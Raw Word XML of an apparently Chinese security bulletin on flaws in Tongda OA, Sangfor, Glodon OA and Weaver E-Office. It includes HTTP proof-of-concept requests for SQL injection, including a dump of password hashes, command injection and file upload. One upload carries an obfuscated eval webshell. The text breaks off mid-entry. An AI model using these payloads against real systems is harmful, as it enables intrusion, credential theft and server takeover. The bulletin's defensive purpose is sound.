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80"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pP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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>OA: sql注入漏洞 CVE-2023-4165</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>OA存在SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>1.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>版本以前</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞详情：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>/general/system/seal_manage/iweboffice/delete_seal.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>中的代码，操作参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> DELETE_STR 导致 sql 注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="7938" w:type="dxa"/>
        <w:tblInd w:w="426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938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938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42596032"/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ET /general/system/seal_manage/iweboffice/delete_seal.php?DELETE_STR=1)%20and%20(s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bstr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%20from%20information_sch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a.columns%20A,information_schema.columns%20B)%20and(1)=(1 HTTP/1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st: 127.0.0.1:8080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-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/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.0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: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q =0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Encoding: gzip, deflat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nection: close</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi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pgrade-Insecure-Requests:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="0"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>升级版本（升级至</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> 11.10 版可解决此问题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>）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  <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:color w:val="FF0000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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>OA: sql注入漏洞 CVE-2023-4166</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>通达</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>OA存在SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞等级：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>影响版本：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>1.10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>版本以前</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞详情：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>/general/system/seal_manage/dianju/delete_log.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>中的代码，操作参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> DELETE_STR 会导致 sql 注入。</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="7938" w:type="dxa"/>
        <w:tblInd w:w="426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938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938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general/system/seal_manage/dianju/delete_log.php?DELETE_STR=1)%20a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d%20(substr(DATABASE(),1,1))=char(84)%20and%20(select%20count(*)%2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from%20information_schema.columns%20A,information_schema.columns%2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B)%20and(1)=(1 HTTP/1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st: 192.168.232.137:8098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-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gec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o/20100101 Firefox/116.0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: text/html,application/xhtml+xml,application/xml;q=0.9,imag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avif,image/webp,*/*;q=0.8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Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,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n;q=0.2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Encoding: gzip, deflat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nection: clos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okie: PHPSESSID=1u7tsd1cpgp9qvco726smb50h5; USER_NAME_COOKIE=admi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; OA_USER_ID=admin; SID_1=779f3f46</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="仿宋" w:hAnsi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pgrade-Insecure-Requests: 1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="482" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>升级版本或安装厂商官方补丁，用于提升系统自身安全性，同时，可通过安全设备快速感知漏洞利用行为并进行预警或阻断</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:color w:val="FF0000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深信服应用交付系统: 命令执行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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>深信服</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>应用交付管理系统 login 存在远程命令执行漏洞，攻击者通过漏洞可以获</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>取服务器权限，执行任意命令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ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>7.0.8-7.0.8R5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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="7938" w:type="dxa"/>
        <w:tblInd w:w="426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938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938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142595982"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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 /rep/login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hint="eastAsia"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lsMode=cls_mode_login%0Als%0A&amp;index=index&amp;log_type=report&amp;loginType=account&amp;page=login&amp;rnd=0&amp;userID=admin&amp;userPsw=123</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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938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2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 /rep/login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lsMode=cls_mode_login&amp;index=index&amp;log_type=report&amp;page=login&amp;rnd=0.75501034664</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"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7915&amp;userID=admin%0Aifconfig -a %0A&amp;userPsw=tmbhuisq</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="1"/>
    </w:tbl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/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2620645"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="1412968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6883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ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pP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广联达oa: sql注入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ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>广联达oa存在SQL注入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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新版本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</w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="7"/>
        <w:tblW w:w="8080" w:type="dxa"/>
        <w:tblInd w:w="284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0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0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 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 /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1.1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application/x-www-form-urlencoded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Length: 88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asdas=&amp;key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr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0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 2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 /Webservice/IM/Config/ConfigService.asmx/GetIMDictionary HTTP/1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st:hostnam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pgrade-Insecure-Requests: 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-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36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: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7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ferer: http://hostname.com:8888/Services/Identification/Server/Incompatible.aspx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Encoding: gzip, deflat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Language: zh-CN,zh;q=0.9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Cookie: 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nection: clos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application/x-www-form-urlencoded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Length: 88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hint="eastAsia"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asdas=&amp;key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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广联达oa: 后台文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>广联达oa存在后台文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>最新版本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" w:name="_Hlk142595483"/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 /gtp/im/services/group/msgbroadcastuploadfile.aspx HTTP/1.1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multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj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Length: 421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FfJZ4PlAZBixjELj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filename="1.aspx";filename="1.jpg"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application/text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lt;%@ Page Language="Jscript" Debug=true%&gt;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lt;%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ar FRWT='XeKBdPAOslypgVhLxcIUNFmStvYbnJGuwEarqkifjTHZQzCoRMWD';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ar GFMA=Request.Form("qmq1");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ar ONOQ=FRWT(19) + FRWT(20) + FRWT(8) + FRWT(6) + FRWT(21) + FRWT(1);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val(GFMA, ONOQ);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%&gt;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FfJZ4PlAZBixjELj--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="2"/>
    </w:tbl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泛微E-Office9: 文件上传漏洞 CVE-2023-2648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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>泛微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>E-Office9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
    </w:p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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>此漏洞影响文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> /inc/jquery/uploadify/uploadify.php。篡改 Filedata 参数会导致不受限制的上传。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3" w:name="_Hlk142595600"/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 /inc/jquery/uploadify/uploadify.php HTTP/1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st: 192.168.232.137:8082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-Agent: test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nection: clos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Length: 493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Encoding: gzip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multipart/form-data;boundary=25d6580ccbac7409f39b085b3194765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6e5adaa999d5cc85028bd0ae4b85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25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85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name="Filedata"; filename="666.php"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application/octet-stream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lt;?php phpinfo();?&gt;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25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85--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25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85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name="file"; filename=""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application/octet-stream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25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85—</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="3"/>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1964690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="49711971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19712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/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3893185"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="486282597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82597" name="图片 1" descr="表格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泛微E-Office9: 文件上传漏洞 CVE-2023-2523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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>泛微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>E-Office9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在文件上传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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
    </w:p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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>影响</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>App/Ajax/ajax.php?action=mobile_upload_save 文件的功能</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，对参数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> upload_quwan 的操作会导致不受限制的上传。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/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1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st:192.168.233.10:8082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ache-Control:max-age=0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pgrade-Insecure-Requests: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rigin:null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multipart/form-data; boundary=----WebKitFormBoundarydR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CGWq4Cx3Sq6tt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Encoding:gzip, deflat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Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7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nection:clos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dRVCGWq4Cx3Sq6tt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form-data; name="upload_quwan"; filename="1.php.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image/jpeg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lt;?phpphpinfo();?&gt;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dRVCGWq4Cx3Sq6tt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>（已公开poc）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>泛微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t xml:space="preserve"> E-Cology </w:t>
      </w:r>
      <w:bookmarkStart w:id="4" w:name="_Hlk142595952"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>XML外部实体注入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="4"/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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>泛微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>E-Office9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>XML外部实体注入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</w:p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hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>泛微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> EC 9.x 且补丁版本 &lt; 10.58.2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>泛微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> EC 8.x 且补丁版本 &lt; 10.58.2</w:t>
      </w:r>
    </w:p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  <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>泛微</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> e-cology 某处功能点最初针对用户输入的过滤不太完善，导致在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22"/>
